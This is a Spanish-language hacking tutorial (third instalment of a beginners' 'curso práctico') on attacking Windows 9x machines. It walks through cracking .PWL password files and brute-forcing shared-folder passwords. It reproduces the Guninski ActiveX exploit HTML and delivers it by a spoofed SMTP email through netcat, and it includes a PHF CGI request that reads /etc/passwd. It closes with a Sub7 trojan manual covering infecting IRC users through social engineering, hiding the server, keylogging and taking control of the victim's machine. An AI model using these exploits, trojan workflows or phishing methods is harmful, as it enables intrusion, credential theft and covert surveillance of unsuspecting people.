Hack3 Com

Descargar como pdf o txt
Descargar como pdf o txt
Está en la página 1de 22

CURSO PRACTICO DE HACKING By Lecter l3ct3r@hotmail.

com Tercera entrega Hola, colegas La verdad es que he tenido mis dudas de continuar con esta pequea introduccin al hacking? por cuestiones de ndole tica. Me preguntaba si no acabara sirviendo de lanzadera para lamers que lo nico que sienten es el impulso de destrozar (informticamente hablando) todo lo que encuentran usando utilidades que apenas conocen bien. Pero porqu tienen que pagar siempre justos por pecadores?. Perdonad este pequeo rollo inicial pero es que quiero que quede muy muy claro cuales son los objetivos que persigo con estos proto tutoriales. Si visitais el grupo es.comp.hackers vereis que el 90% de los posts son peticiones lamer, de cracks o programas, puro spam y varios flames. Por no considerar aquellos mensajes que son dudas de informtica bsica, etc... Ante esta situacin, muchos estudiosos experimentados se inhibieron y establecieron la lista hackindex, moderada y excelente para un cierto nivel y que halago y respeto por lo bien que lo estn haciendo, y a la cual yo pertenezco tambin aunque apenas pueda colaborar con ellos por el poco tiempo que me permite mi trabajo. NBK, Seldon, Pistone, Emma-O, y otros muchos estn haciendo una gran labor, pero ya apenas veo sus posts por es.comp.hackers. Yo haba hecho lo mismo, pero siempre me atrajo la idea de promover a los wanabees, es decir a los que quieren empezar pero no encuentran demasiado abonado el campo y cuando aparecen por es.comp.hackers pues a menudo se les manda como mnimo a leer las FAQ y a buscarse la vida... Eso es lo que yo hice hace tanto tiempo, pero reconozco que al correr los tiempos, el acervo de conocimientos crece y no viene nada mal encontrar un guin de cmo hacer y qu estudiar. Aunque venero los autodidactas, esta introduccin la estoy haciendo pensando en los que empiezan y tienen inquietudes sanas. Muchos colegas de la lista siempre ayudan cuando la pregunta sigue la netiqueta y cuando primero se ha buscado infructuosamente por uno mismo. Ellos son los que mantienen el esplendor y el futuro del grupo. Espero que continueis avanzando Y ya sabeis, lo que expongo es nicamente con fines educativos... Si no, os comer el hgado con una habitas baby y un buen vaso de Amarone Saludos, LECTER

Captulo 3. Asaltando al Windows 95/98/ME


Ya sabeis que M$ intent acercar tanto el ordenador personal a los hogares que intent poner las cosas demasiado fciles al usuario final al principio y despus todo ello gravit como espada de Damocles cuando se establecieron las redes y el administrador no se haba preparado suficientemente. Los ataques locales son tan sencillos que asustan: Lo ms simple es reiniciar el sistema si tiene activado el protector de pantalla. Las peticiones de contraseas durante el arranque son, como dicen los autores de Hacking 2, puramente cosmticas y pulsando el botn cancelar el sistema continuar su arranque normal, permitiendo el acceso a sus recursos. Si de todas formas, no queremos hacer tamaa lamerada, podemos emplear el recurso de insertar un CD rom especial. Win9x muestrea regularmente si se ha insertado un CD rom. Si este CD rom contiene el archivo Autorun.inf, se ejecutarn los programas que aparecen en la lnea open= incluso aunque se encuentre funcionando el salvapantallas. Una vez perpetrado el allanamiento, lo ms preceptivo es ir a por las claves. La lista cifrada de las contraseas en Win9x se encuentra en los archivos .PWL, normalmente sitos en C:\Windows. En vez de pasarnos delante de la mquina un ratito, lo que debemos hacer es copiar estos archivos a un floppy: copy C:\Windows\*.pwl a: y luego crackearlas en casita como buen freaky. Estos archivos *.pwl contienen las contraseas ocultas de acceso a recursos protegidos, acceso telefnico a redes, etc. Para crackear estos archivos podemos usar PWLTOOL. Una versin suficientemente buena y completa es la 3 (comercial, no demo), que podeis encontrar en: http://www.hackgroup-ld.f2s.com/soft-pass.html bajad pwltool 3.0, que viene con nmero de serie. No voy a enrrollarme demasiado con este programa; una imagen vale ms que mil palabras:

Otro excelente crakeador de PWL es Cain 1.5, que podeis bajaros de http://www.confine.com/downloads.shtml

En este caso basta con accionar el icono de PWL files y entonces vamos a File y seleccionamos Add to list.

Entonces nos saldr una ventana para que indiquemos la ruta del archivo *.pwl. Lo hacemos y a continuacin podemos comenzar el ataque mediante las opciones estupendas que tiene el programa.

Pero estas tcnicas son en el fondo explotaciones locales del Win 9x que no son la esencia delhacking. As pues, vamos a considerar algunos posibles asaltos remotos al PC bsado en Windows 9x, y comenzaremos por la entrada ms comn: Conexin a los recursos compartidos. 3.1 Conexin a los recursos compartidos En la segunda entrega ya hablamos del Essential Nettools para la enumeracin en Win NT/ 2000. Pues aqu, ms de lo mismo. Con esta herramienta podemos escanear intervalos de IP para encontrar ordenadores con el puerto NetBIOS abierto. Para ello, activaremos la opcin NBScan e indicamos una IP de comienzo y otra final de escaneo. Al poco rato tendremos un listado de PCs. Miraremos la etiqueta RS (Resource Sharing) para ver si tienen recursos compartidos (Yes o No). En nuestro ejemplo de pequea LAN casera observamos que HAWKING y PENROSE tienen recursos compartidos y no estaban protegidos con ningn firewall (Recomiendo encarecidamente que instaleis un firewall personal, por ejemplo el simple Zone Alarm que es gratis y aunque no es tan verstil como otros es suficientemente bueno para evitar estas intrusiones y bloquear el puerto NetBIOS y que podeis descargar de http://www.zonelabs.com/). Si hacemos click con el botn derecho del ratn sobre por ejemplo la lnea de HAWKING se nos abre un men desplegable y escogemos la opcin Open Computer

Ya estamos dentro. Nos aparecer una ventana como esta y podremos navegar por tales recursos si es que los comparte sin contrasea .

Vamos a hacer doble click sobre el recurso CDR por ejemplo para explorar. Pero Qu ha pasado? me pide la contrasea ! Vamos pues a considerar este caso. Escoger Cain 1.5 para intentar crackearla Porqu no escojo NAT? Pues porque Win 9x por definicin es un sistema mono usuario y por lo tanto no es necesario crackear user names y passwords, sino solamente contraseas sin especificar nombre de usuario. As pues arrancamos Cain, nos vamos a las opciones y las configuramos para que utilice la fuerza bruta como vemos aqu:

Con un procesador rapidito, podremos hacerlo razonablemente. Como la mayora de los usuarios finales pasan cantidad de la seguridad, podemos marcar en primera opcin nicamente las letras (A-Z) y probar as. Una vez configurado, seleccionamos la pestaa de Remote Shares (El icono del ordenador y la manita), vamos a File y seleccionamos Add to list:

Luego escribimos el nombre de la mquina y el rcurso que queremos crackear:

Hacemos OK y entonces nos aparecer en la pantalla de Cain. Lo seleccionamos con el ratn, damos al botn derecho y escojemos Start Attack

Entonces veremos como comienza el ataque y contina...

Hasta conseguir el resultado buscado:

La contrasea era MONO. Ahora ya podemos colarnos en esa carpeta. Si en lugar de encontrarnos en este recurso, fuera la particin raz XDDD... De todas formas podemos introducir en la carpeta compartida un determinado cdigo malicioso con un nombre sugestivo. Parece mentira, pero si un usuario ve un ejecutable que no recuerda, lo primero que se le ocurre es hacer doble click sobre l. Vamos a ver ahora una guarrerida basada en la vulnerabilidad de los controles ActiveX y que permite la ejecucin de cdigo mediante correo electrnico. 3.2 El ataque Guninski En 1999 George Guninski y Richard M. Smith descubrieron una vulnerabilidad en los controles ActiveX para Internet Explorer.configurando la bandera safe for scripting en los controles, los programadores pueden ingnorar la verificacin de firma Authenticode. Uno de ellos es el control ActiveX Scriptlet.typelib que puede permitir la ejecucin de cdigo forneo en nuestro PC solamente con LEER el correo con el Outlook. Cmo podemos hacer esto? Pues enviando un correo que contenga un cdigo malicioso HTML, como el ya bien conocido de Guninski (http://www.nat.bg/~joro/scrtlb-desc.html): ---------------------CODIGO MALICIOSO---------------------------<object id=scr 006008C3FBFC> </object> classid=clsid:06290BD5-48AA-11D2-8432-

<SCRIPT> src.Reset(); src.Path=C:\\WINDOWS\\start menu\\programs\\startup\\guninski.hta; src.Doc=<object id=wsh classid=clsid:F935DC22-1CF0-11D0-ADB900C04FD58A0B></object><SCRIPT>alert(Escrito por Georgi Guninski http://www.nat.bg/~joro); wsh.Run(c:\\WINDOWS\\command.com); </+SCRIPT>; src.write(); </SCRIPT> </object> -----------------------------fin---------------------------------Como explican los autores de Hackers 2, este codigo, lleva a cabo el ataque en dos etapas: primero crea un archivo de aplicacin HTML (guninski.hta) en la carpeta de inicio de usuario; todo ello de manera silenciosa...luego, cuando el usuario reinicia la mquina, el archivo guninski.hta se ejecuta con el mensaje: Escrito por Georgi Guninski http://www.... Evidentemente, en lugar de esta inocente misiva, podramos haber hecho estragos en el PC de la vctima...pero no quiero dar ideas.Ahora bien Cmo enviamos el mensaje con dicho cdigo malicioso a nuestra vctima? Si tuviramos un Unix/Linux a mano, cualquier cliente de correo como pine o mutt e incluso el mismo mailx nos sobraran. En el caso de hacerlo desde Windows, podemos escribir en un archivo de texto el protocolo necesario que contenga los comandos SMTP necesarios y luego canalizar la salida al servidor de correo apropiado empleando netcat por el puerto 25. As escribiramos el archivo de texto lamercillo.txt que se muestra a continuacin: helo mail from: <hlecter@baltimore.gov> rcpt to: <ingenuo@victima.org> data subject: Lista de Seguridad CERT Importance: High MIME-Version: 1.0 Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit <HTML> INSERTAR AQU EL CDIGO MALICIOSO COMO EL ANTERIOR DE GUNINSKI </HTML> . quit -------------------------------------------fin-------------------------------------------------------------A continuacin, si tenemos un servidor de correo por ah que nos permita enviar sin restricciones y ocultar la IP (mail.utopia.net), entonces haremos: type lamercillo.txt | nc vv mail.utopia.net 25 y ya est. Si la vctima lo lee con el Outlook/OE, lo menos que le puede ocurrir es encontrar ese mensajito en el arranque.

Por cierto, ya que hablamos de netcat recomiendo a todos que lo estudiesis detenidamente...es una joya. Por esa razn incluyo en las pginas siguientes una especie de manual que aparece en el Manual de HACK de la recopilacin de @RROBA por Andrs Mndez y Manuel E. Baleriola con motivo de la tercera entrega de sus artculo sobre Back Oriffice. Es un simple OCR scan (con Fine Reader por supuesto ). -------------------------------------------Aqu comienza---------------------------------------------------------BACK O R F I C E III

Curso de hacking (nueva poca) 18 Entrega

Back Orfice III


TCP/IP: Para utilizar esta opcin tendremos que echar mano del NetCat (tambin conocida como la navaja suiza en lo que a aplicaciones de red se refiere), otra de las filigranas que rulan por la red. NetCat Vamos a explicar primero todo el NetCat para que luego entendis para qu lo emplea el BO. El NetCat se concibi inicialmente para Linux, aunque aos ms tarde se port a Windows, donde es ms prctico. Te dejamos el programa para Windows y Linux en D:\HACK\NETCAT\.
La utilidad del NetCat no es otra que abrir puertos y enviar/recibir informacin a travs de stos (al fin y al cabo a eso se reducen todos los programas sobre redes). Y qu tiene de especial? Pues, por ejemplo, poder enviar un fichero entre dos personas, sin necesidad de un mediador, como un servidor de correo o de IRC, o capturar las cosas que se envan a un puejto. Los comandos del NetCat (a partir de ahora NC) son: -o -u -l -L -s -d -P -r
-V

-w -i

-e -t -z -n -a < >

Logea Usa UDP en vez de TCP Escucha (listen) Contina a la escucha aunque el cliente desconecte IP de origen (source) No abre una ventana de MS-DOS (detach) Puerto (port) Puertos aleatorios (random) Mostrar lo que pasa (verbos) si ponis ms de una vez "-v" har un verbose ms exhaustivo Esperar tantos segundos (watt) Intervalo de descanso entre cada paquete de datos que se envan Ejecutar un programa al conectar Permitir conexin tipo telnet Impide enviar datos No busca el nombre asociado a la IP NIY Enviar Recibir

El NetCat cuenta con ms opciones, que podis ver mediante la opcin -h, pero que de momento no utilizaremos. Vamos a empezar por un caso sencillo. Imagina que tienes una red con Windows 9x y que quieres pasarle un fichero desde tu ordenador PROPIO (cuya IP es 192.168.0.1) a su ordenador AJENO (cuya IP es 192.168.0.2). Lo que tu vas a hacer es montar un servidor y AJENO va a usar un cliente. Un servidor lo nico que hace es que, ante una peticin, da lo que se le pfae. En nuestro caso el fichero a dar es gastos.txt. Ejecutas el NC con estas opciones: nc -1 -p 1000 < gastos.txt -1: Esta opcin indica que est a la escucha de que alguien le solicite algo. -p 1000: Esta otra opcin indica el puerto (el 1000) que estar escuchando el NC (donde se realizar la peticin). < gastos.txt: Indica que, tras la conexin, a ese puerto se le va a enviar el fichero gastos.txt. Si queremos ver qu ocurre en cada momento basta con poner: nc -v -v -1 -p 1000 < gastos.txt -v -v: Nos muestra el log con todo lo que pasa. Vale, ya tenemos nuestro servidor esperando a que alguien se conecte. Ahora veamos qu es lo que tiene que hacer AJENO. A l le toca ser el cliente, as que tendr que pedir por esa boquita: nc -v -v 192.168.0.1 1000 > gastos.txt 192.168.0.1: La direccin IP a la que conectarse para recibir algo. 1000: Puerto del ordenador remoto al que conectarse. > gastos.txt: Salva todo lo que reciba del servidor en el fichero gastos.txt. NOTAS: - Evidentemente, primero hay que montar el servidor y luego el cliente. El servidor no cierra la conexin hasta que se pulse CTRL-C. - La nica forma de saber que se ha completado la transferencia es tener el ratn sobre la ventana de MS-DOS y esperar a que el reloj de arena desaparezca. Se recomienda que sea el cliente quien cierre la conexin. El nombre del fichero de salida y destino no tienen que ser el mismo.

No ha sido tan difcil, verdad? Pues esta herramienta que por ahora parece tan simple sirve para todo (la lnea de comandos es ms potente que una ventanita, y si no mirad el Linux). La utilidad en el caso de que le queramos enviar algo al infectado con el BO es bien simple, basta con ejecutar el NC de esta forma: nc -v -v -1 -p 100 < autoexec.bat Os vais a la opcin TCP file receive del BO y ponis: Opcinl: c:\autoexec.bat Opcin2: tu_IP: 100 Alguno se preguntar que si es el BO el que lo recibe qu le importa nuestra IP?, para qu ponemos nuestra mquina a la escucha y no a enviar como en el ejemplo? Veris, lo que hace el BO es ponerse como cliente y conectarse a nuestro ordenador que hace de servidor. Ahora veamos cmo recibir un fichero de la mquina infectada. Configuramos nuestro NC as: nc -v -v -1 -p 100 > autoexec.bat Como veis, nuestro ordenador ahora hace de cliente. Sin embargo, no le especificamos que se conecte a un servidor, sino que ser el servidor el que se conecte con nosotros y todo lo que recibamos lo almacenaremos ">". Os vais a la opcin TCP f i l e send del BO y ponis: Opcin 1: c : \ autoexec. bat Opcin2: tu_IP:100

Como veis en el BO siempre se pone lo mismo, ya se encarga l mismo de ser cliente o


servidor. Y ya que estamos vamos a explicar todas las filigranas que se pueden hacer con este programita que ocupa menos que tu paga a fin de mes. Algo muy prctico es la opcin -o para loggear todo lo que ocurre. Basta con aadirle al nc la opcin -o fichero. log para que almacene (tanto en ASCII como en texto plano) todo lo que ocurra. Ahora imagina que en tu ordenador hay montado un SMTP en el puerto 25 (o un proxy) y quieres pillar todos los emilios que enva AJENO, en este caso basta con poner al NC a or en ese puerto, pero como ya est siendo utilizado tendrs que anteponerte al servidor SMTP. Esto se hace especificando la IP de origen (porque ese puerto antes escuchaba a cualquier conexin) para que le d preferencia al NC.

nc -v -v -1 -s 192.168.0.2

-p 25 > smtp.txt

Lo que acabis de hacer es primo hermano de los sniffers (de momento, con que sepas que son capturadores de paquetes va que chuta). Si creis una lnea de comandos excesivamente larga, el MS-DOS os la rechazar (tiene un lmite de caracteres). Lo que tenis que hacer es ejecutar el NC sin ninguna opcin y l luego os pedir las opciones. ) Veamos qu ms cosillas se pueden hacer con la suiza, ahora me saco la cinta adhesiva... (Me siento como Me Gyver, jejeje). Lo mejor para ver in situ los puertos que abrimos para la escucha y envo de ficheros es que utilicis alguno de los programas que ya os dimos para ver las conexiones de vuestra mquina. Uno de los mltiples usos que se le puede dar al NC es el de ver los ataques que recibimos del BO. S, s, lo nico que tenis que hacer es poner al NC a escuchar el puerto 31337 usando UDP y podris ver quines intentan atacaros: nc -v -v -1 -u -p 31337 Otra utilidad es usarlo como escaneador de puertos. Para escanear los puertos desde el 20 al 30 (ambos inclusive) del www.servidor.es basta con ejecutar: nc -v -w 2 -z www.servidor.es 20-30 El escaneo seguir este orden de puertos: 30, 29, 28, 27... 20. Tambin es capaz de utilizar la tcnica del strobe scanning escaneando puertos aleatoriamente: nc -v -w 2 -r -z www.servidor.es 20-30 Si a esto le sumis que puede escanear paquetes de puertos: nc -v -w 2 -z www.servidor.es 20-30 130-140 Muchas veces os conectis a alguna pgina y sta os manda a otro sitio (como los redireccionadores fly.to, pagina.de...). En muchas ocasiones, la direccin y.to no desaparece del navegador y no podis conocer en qu servidor estis actualmente. Otras veces queris conocer el cdigo fuente de una pgina (index.html) pero sta os abre varios marcos de forma que no podis ver su cdigo fuente sino el de los marcos. Una forma de conocer ese cdigo fuente para ver cmo funciona es conectndoos va telnet a su puerto 80 y escribirle: GET /index.html

De esta forma recibiris el cdigo fuente de la pgina en plain text (texto plano - significa que no est codificado y que puedes leerlo tal cual). Por si alguien lo ha pensado, s, esto es lo que hacen los navegadores. Un navegador web no es ms que un intrprete de HTML, se baja el cdigo fuente, lo procesa, busca links a imgenes, se las baja, las muestra y nada ms (a grandes rasgos). Como veris ms adelante los programas de correo, de news, incluso la conexin a Internet se realiza mediante simples telnets aunque gracias a los programas se nos muestra ms ameno. Parece como si nadie ms que esos programas fueran capaces de procesar esa informacin. Bueno, pues esto tambin se puede hacer con el NC, aunque no tiene demasiado inters, pero lo que si es interesante es conocer si, por ejemplo, ese servidor tiene algn CGI del que conocemos algn bug. Por ejemplo, si queremos mirar si tiene el PHF, basta con crear el fichero cgi.txt que contenga:

GET /cgi-bin/phf?Qname=root%OAcat%20/etc/passwd
Ahora para chequear si el servidor www.servidor.es tiene este bug basta con ejecutarle el NC: nc -v -w 10 www.servidor.es 80 < cgi.txt Ahora de vuestra imaginacin y pericia depende crearos vuestro propio escaneador de vulnerabilidades. Para jugar con esta navaja suiza (cuidadn no te vayas a hacer pupila) podis utilizar dos sesiones de NC, una enviando y otra recibiendo, o utilizar el Har's TCP/IP Protector para abrir puertos y ver qu reciben.

-------------------------------------------fin----------------------------------------------------------------------Espero que os haya servido. Ahora, para terminar hoy nos vamos a dedicar a otra posibilidad de hacking del Win 9x mediante troyanos como el que hace referencia el manual, el temido BO... 3.3 Troyanos en Win 9x Los troyanos o caballos de troya son programas que aparentemente tienen una utilidad, pero que cuando se ejecutan, instalan soterradamente aplicaciones malvolas, como ocurri en la Guerra de Troya...dentro del regalito (el caballo) estaba escondido un ejrcito devastador: Timeo Danaos et dona ferentes (Desconfa del enemigo que hace regalos). Una de las posibilidades ms atractivas para los hackers es que ese programa establezca una Puerta Trasera en el PC infectado; es decir un mecanismo por el cual podemos acceder al PC remotamente. Para este fin contamos con los graciosamente llamados Servicios de Administracin Remota, como el conocidsimo Back Oriffice, Back Oriffice 2000, Netbus o el ms exitoso de todos ellos y que les supera en estabilidad, facilidad y versatilidad: SUB SEVEN. La pgina oficial de subseven es http://www.subseven.slack.org pero ahora parece que est inactiva, aunque tiene algunos enlaces a otra pgina que proporcionan las ltimas versiones de subseven como la 2.2 final. No obstante podreis comprobar que no funcionan. Y no os bajeis el subseven de cualquier server, porque podrais ser usados de cohinillos de indias. En la prxima entrega os indicar un servidor del que os podais fiar para bajarlo si es que ya no lo teneis. El servidor de subseven escucha por defecto en el puerto tcp 27374, pero puede cambiarse a otro y dicho puerto es el predeterminado tambin para que escuche el cliente. Sub7Server (S7S) proporciona al intruso un control total sobre la mquina vctima (tomado de Hacking 2): -analiza los puertos -inicia un servidor ftp desde C: con permisos de lectura y escritura -edita el registro remotamente -extrae las contraseas cach de RAS, ICQ, etc -redirecciona puertos y aplicaciones

-permite impresin -reinicia el sistema remoto limpiamente o a la fuerza -registra las pulsaciones de teclas (que se escuchan en el puerto 2773) -terminal remoto (escucha en el puerto 7215) -secuestra al ratn -espa aplicaciones remotas (ICQ, AOL, MSN...) -ejecuta un navegador y se conecta con el sitio definido por el usuario.

Vamos, la leche! Un manual esquemtico y sencillo lo podeis encontrar en http://alberto.tlsecurity.com., pero he encontrado en la red otro que me ha gustado y que os pego a continuacin:
============================================================================ = MANUAL DE USO DEL SUB SEVEN POR Simbiosys = ============================================================================ Nota: Este texto esta publicado debido a los mails que nos llegan preguntando que es un troyano, que es el bo, etc. D.h. no se hace responsable por un acto lamer que puedas hacer y si sos tan hacker usalo pero para aprender y no para asustar a un pobre internauta inocente. Introduccion: Este manual se ve mejor si no esta maximisado, ya que lo hice asi y asi se ve mejor, bueno para los que no entienden que es esto de Sub Seven o Sub 7 que es exactamente lo mismo, este es un troyano, pero Que es un troyano? Ok, Aca va lee y entendelo bien, Un troyano o tambien conocidos como troyan horse (caballo de troya) es un programa que aparenta tener una utilidad mientras tiene otra. Generalmente son enviados por dcc o adjuntados a programas en la inet, estos al ser ejecutados

hacen que un puerto, segun el puerto que utilice cada troyano, sea abierto lo que permite mediante muy pocos elementos, el que se lo metio tenga acceso a todo nuestro disco rigido (hd) y unidades fisicas (A:, D:, y otras particiones en nuestro hd) Una ves metido el troyano tenemos acceso a todo, hasta podriamos formatearle el rigido. }=-) pero, no seamos malos ;-). En este simple txt te voy a ensear algo de ingeeria social, utilizacion, comandos, y edicion de este magnifico troyano. El Sub Seven. Nota de D.H.: El fin de este manual es con usos educativos, no para que vayas al irc corriendo a usarlo infectando y formateandole la computadora a un pobre usario comun y creyendote un super hacker. *************************************************************** / *PASOS A SEGUIR PARA HACKEAR UNA MAQUINA CON EL SUB 7*\ *************************************************************** 1- Bajarse el troyano, desde la pagina de crobytex esta el troyano completo, el editserver.exe, el server.exe (troyano) y el SubSeven.exe (cliente) de este troyano. ATENCION: NUNCA EJECUTAR EL SERVER.EXE YA QUE ESTO NO HARA DEBIL A EL ATAQUE, NOS PODRAN HACKIAR LA MAQUINA ESTA CLARO NO???? NO VAYA A SER QUE SEAS UN TOQUETON Y EJECUTES EL SERVER DEL TROYANO POR QUE SINO FUISTE. Pero Para que sirve cada uno de estos archivos que mencione? Aca vamos: El editserver (editserver.exe) sirve para editar el cliente del troyano (SubSeven.exe) este sera nuestro primer paso. Luego esta el server.exe (troyano) que no debemos ejecutar. Y por ultimo el SubSeven.exe (cliente) este es el que vamos a usar para hackiar una maquina. 2- Editar el server.exe (troyano) a nuestro gusto. ATENCION ESTE PASO SE PUEDE SALTEAR TRANQUILAMENTE YA QUE VIENE UNA SIMPLE CONFIGURACION POR DEFECTO. 3- En simples palabras "HACKIAR!!!!!" te gusto esa palabra no? YeaHh! *************************************************************** /* A TRABAJAR SE HA DICHO *\ *************************************************************** 1- Si no tenes el paquete de sub seven bueno bajatelo por que sino vas a le muere hermano. 2- Para editar el server ejecutamos el editserver.exe, ya esta? Dale ejecutalo que te espero. ;-) Bueno a partir de aca te voy a traducir paso por paso para que entiendas esta parte que esta muy buena. Son 10 pasos de los cuales estan todos en ingles, pero gracias a mi vas a poder pasarlos sin ninguna dificultad. Copado no? 2/1- En el paso numero 1 nos da una bienvenida y el autor nos cuenta un par de chamullos a los que no da para ponerlos aca. ;-) Ponemos siguiente y listo. 2/2- Bueno, en primer lugar, debemos asignar el lugar donde se encuentra el server.exe, clickiar el boton "Browse" y buscar el archivo. 2/3- Ok, ahora debemos, si queremos, tildar las tres casillas y en la primera asignarle un puerto, el que quieren que el server abra,

si no la tildan, quedara el 1243 que es el que usa sub seven por defecto. Luego debemos asignarle un password, asi el unico que podra hackiar seremos nosotros debido a que si otro intenta hackiar, tendra que introducir el password que pusimos. Al menos que sepa el password, esto cambiaria todo. la tercer casilla activemosla si queremos aunque si no la activamos lo de el password no tendra ningun efecto al activarla este protejera el puerto mediante el password que pusimos al hackiar nos pedira el password. ;-) bueno no? Pulsa sig. y listo el tercer paso. 2/4- Especifica el nombre del archivo del servidor, despues de la instalacion incluyendo la extension. Ya que el sub7 nos permite darle un nombre y otra extencion que no sea ejecutable. ;-B (specify filename). Aunque si no tenes ninguna idea lo que es esto, solo usa lo que viene por defecto: (use default name). Al activar la ultima casilla lo que hara sera que el servidor, despues de la instalacion o sea cuando la victima ejecute el servidor, este servidor se instalara y borrara el archivo ejecutado. Esta copado esto, no? Seeehh! Siguiente y listo ese paso. 2/5- Otras de las maravillosas cosas que se pueden hacer con el sub7 es configurar el servidor para mostrar un mensaje del error falso cuando la victima lo ejecuta (el server) por primera vez. El mensaje de las imitaciones silo se mostrara una vez, o cada vez la victima ejecuta el archivo del server. Para hacer esto debemos clickiar la casilla y luego clickiar donde dice "configure" asi podemos configurar el mensaje, icono, opciones, etc. Seguramente para esto no vas a tener ningun problema. Es facil che! Pero que mas da, cualquier cosa podes enviar un mail a la direccion que figura en la pagina de crobytex. 2/6- Esta parte esta genial. Podemos configurarlo para que no avise cuando el usuario esta conectado, no puede avisar a nuestro icq, nuestro canal en el irc, o a nuestro e-mail!!!!! jajaja! me encanta hacer esto. Para hacerlo debemos tildar lo que nos interese si tenemos icq, icq. Si este se encuentra en el mismo irc que nosotros podemos asignarle que no avise poniendo el irc, puerto y que canal queres que te avise, o sino a el mail pero a el mail es un quilombo por que es solo si tenes el e-mail en alguno de los servidores de la lista. Esta buenisisisimo!!!. 2/7- Obio que cada server puede ser editado diferente por ejemplo debemos tener un server para cada victima me explico? bueno. Copiando y pegando se pueden crear muchisimos server y cada uno editarlo de distintas maneras. En esta parte debemos poner el nombre de la victima, con esto podremos identificarla. 2/8- Para que no se de cuenta de la presencia del troyanos, hay metodos. El metodo carga de la computadora. Si la victima es un usuario de las experimentado en windows entonces tilda (less known method) o (_not_known method). Si la victima no tiene experiencia usa cualquiera de los otros metodos. 2/9- -Falta poco! -No aflojes ahora! ;-D Bueno, son las dos ultimas opciones: El archivo exe, para usarlo con el cliente Y la segunda casilla es para que el server que editamos no pueda ser modificado. Nos pide un password y la proxima ves que queramos editarlo, bueno no va a pedir el password que pusimos. -No te lo olvides!. 2/10--LLegaste papa! Solo resta salvar todo y hackiar! Bueno seguro que no entendes que corno dice ahi pero bue! yo te explico. El primer icono salva todo con los nuevos cambios. El segundo lo que hace es guardar los cambios pero en otro server o sea copia

otro server y guarda los cambios dejando un server limpito como viene de fabrica! ;-) Ja!. Y bue llegamos a la ultima opcion que es la de salvar todo asi como esta y salir rapidamente. Copado no?

*************************************************************** ACA SE TERMINARON LAS INSTRUCCIONES DE EDIT SERVER *************************************************************** Ahora lo unico que resta es aprender un poco de ingenieria social, el arte de cagar gente. ;-) Me explico? JaJaJa! Buen A ver....Como le metemos el server a un guachito? hay muchas formas pero antes que nada debemos cazar a uno. Luego averiguar el ip. Esto es facil de hacer ahi en el chat simplemente ponemos: /dns elnick Por ejemplo /dns pepito Y no respondera en el status algo como esto: ----------------------------------.Looking up... pepito@200.1.5.7.90.com -.Resolved ip: 222.55.69.012 ------------------------------Esa es el ip: 200.55.69.012 Despues que hayas conseguido y anotado el ip, podemos comenzar. Debemos meterle el server.exe a la victima, de ahi viene la ingenieria social, te tenes que arreglar para que reciba por dcc, e-mail o como carajo quieras. Por ejemplo tenes que lograr que la victima ejecute el server.exe, eso va por tu imaginacion, me explico? Bueno. Una ves que se lo mandaste, solo queda divertirse ya que este troyano posee lo mejor para cagarse de risa de los que boludean en el irc. Ya que podemos hacer de todo, desde sacarle archivos, mandarle mensajes, meterce en sus conversaciones del chat, ver sus hd, borrarle archivos, ver sus imagenes, sacarle sus claves de internet y infinitas cosas te explicare a continuacion: 1- Comenzando a usar el sub seven. Bueno se supone que ya le metiste el server y ya lo activo, si es asi, en la pantalla principal del sub7 donde dice ip, arriba a la izquierda, debemos colocar el ip, si le asignamos un puerto especial debemos colocar donde dice port: el puerto si no hemos editado el server el puerto que viene por defecto es correcto. Si todo esta listo clickiamos en connect. Al lado de connect hay un signo de admiracion, ! es para realizarle un ping a el ip entonces nos dara un numero el cual equivale a el retraso de informacion entre nuestra maquina y la de la victima, conocido como LaG. Quedara algo como esto: |-------------------------------------------------------------------| | |sub7| ip: aca va el ip |port: elpuerto| connect |!| medir-el-lag | |-------------------------------------------------------------------| Bueno ahora estamos adentro de la victima ENTENDES ESO??? -----------ESTAS HACKIANDO UNA MAQUINAAA!!!!!!!!!!!!!!!!!!!! ------FELICIDADES!!!!!!!, pero esto es solo el principio, las cosas que podes hacer ahora vas a ver. jejeje! bueno ya fue. A tu izquierda tenes una barra con muchas utilidades, al clickiar en el boton "connection" se abrira un sub menu. | ip scaner |-| get pc info |-| get home info |-| server options || ip notify |

/*IP SCANER*\ Empecemos por "ip scaner" esto es una utilidad recopada por que podemos asignarle ips para que escanee si encuentra alguno abierto y este no esta editado y no presisamos clave, entonces el trabajo de ingenieria social, ya esta echo solo debemos colocar el ip y darle a el boton de "connect" ;-)). Por ejemplo le asignamos que escanee desde un ip hasta otro, entonces quedaria asi: |.....................................................................| ||start ip| |210|.|17|.|53|.|1| |SCaN| ||end ip| |210|.|17|.|53|.|255| |StOp| ||port: 1243|-----------|delay:4| | |.....................................................................| Luego de terminar el scan nos tirara las ip con ese puerto abierto entonces la anotamos y bueno, "connect" como ya les explique antes. /*GET PC INFO*\ Bueno aca no hay mucha ciencia al conectarnos, y clickiar en este boton nos dara mucha informacion del usuario, inexplicable. creo que hay informacon que no se ni para que sirve!. /*GET HOME INFO*\ Esto te dara todo sobre la victima, claro que si en la instalacion de win cuando te pide los datos puso todo trucho no va a dar informacion trucha pero igual esta re-copado! /*SERVER OPTIONS*\ De aca se puede modificar la edicion del server como antes lo explique estan todas la opciones anteriores. Tambien desde aca podemos desconectarlo de internet pero con esto perderiamos el contacto y bueno "conexion al carajo" /*IP NOTIFY*\ Podemos modificar la parte donde en el edit server no avisa cuando la victima esta conectada. ---------------------------------------------------------------------Pasamos a el otro boton "Keys/Messages". Podemos ver el sig. sub menu: |Keyboard|Chat|Matrix|Msg manager|Spy| /*Keyboard*\ -Open keyloggerEsta opcion, al ejecutarla el sub7 abrira una ventana, en esta tenemos que poner start logging y este grabara todas las teclas que pulse la victima a partir del momento en que lo activamos. Podemos grabarlas en un Txt(save), limpiar la ventana(clear), y parar el logging (stop). -Disable keyboardEsta opcion sirve para desactivar el teclado de la victima. Que garron no? JuAsJUaS! /*Chat*\ Esta opcion abre una ventana con la cual podemos chatear con la victima (chat with the victim), tambien hay otra opcion para hacerlo con otro cliente(chat with other clients). Solo elegimos los colores, fuente, tamao y a escribir!. /*Matrix*\ Es una ventana que editamos con un texto o lo que fueres luego ponemos

